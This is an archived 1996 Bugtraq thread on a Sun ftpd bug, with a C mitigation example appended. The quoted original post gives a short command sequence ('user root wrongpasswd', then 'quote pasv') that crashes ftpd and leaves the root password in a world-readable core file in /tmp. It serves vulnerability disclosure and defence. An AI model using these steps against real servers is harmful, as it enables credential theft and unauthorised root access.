Bugtraq mailing list archives

Re: ftpd bug? Was: bin/1805: Bug in ftpd


From: gamble () dxcoms cern ch (gamble () dxcoms cern ch)
Date: Wed, 16 Oct 1996 10:04:28 +0200


Doesn't work for me ... SunOS 4.1.1

SOMEWHERE>ftp sunos
220 sunos FTP server (SunOS 4.1) ready.
Connected to sunos.xxx.xx.
Name (sunos:smith):
331 Password required for smith.
Password:
230 User smith logged in.
FTP> cd /tmp
250 CWD command successful.
FTP> user root fred
530 User root access denied.
%FTP-E-LOGREJ, Login request rejected
FTP> quote pasv
421 Service not available, Remote server has closed the connection
SOMEWHERE>

and no core in /tmp

John
------------------------------------------ original message


James Poland 6-5251 wrote:

On Solaris 2.5.1, the core file contains only the user's password in
cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
    so they seem to have used the proposed fix

         Checking for "pw != NULL"

    So this proposal was simple and obvious   ... and incomplete. :)
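
The leak discussed in this thread is a password still held in the ftpd process's memory when it dumps core into a world-readable file. As an added example (not part of the original posts and not Sun's code), the following C shows two process-level mitigations: forbidding core files before any credential is read, and scrubbing the password buffer after every login attempt, failed or not. The function names and the sample strings are hypothetical.

```c
#include <stddef.h>
#include <string.h>
#include <sys/resource.h>

/* Forbid core files for this process; returns 0 on success, -1 on error.
 * Call it at daemon start-up, before any credential is read. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };   /* soft and hard limit both zero */
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Current soft core limit, or -1 on error (used to verify the setting). */
long core_soft_limit(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0) return -1;
    return (long)rl.rlim_cur;
}

/* Overwrite a secret through a volatile pointer so the compiler cannot
 * drop the stores as dead writes. */
void scrub_secret(char *buf, size_t len)
{
    volatile char *p = buf;
    while (len--)
        *p++ = 0;
}

/* Hypothetical stand-in for the daemon's password check: compares the
 * attempt with the expected value, then scrubs the attempt whether the
 * login succeeded or failed (the "user root wrongpasswd" case above).
 * A real daemon compares password hashes, not plaintext. */
int check_and_scrub(char *attempt, size_t cap, const char *expected)
{
    int ok = (strcmp(attempt, expected) == 0);
    scrub_secret(attempt, cap);
    return ok;
}

int main(void)
{
    char attempt[32] = "wrongpasswd";          /* constructed sample input */
    if (disable_core_dumps() != 0) return 1;
    int ok = check_and_scrub(attempt, sizeof attempt, "expected-secret");
    return (ok == 0 && attempt[0] == 0) ? 0 : 1;
}
```

With the core limit at zero a crash like the one above leaves no file behind, and the scrub limits what a debugger or a dump taken by other means could still find.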


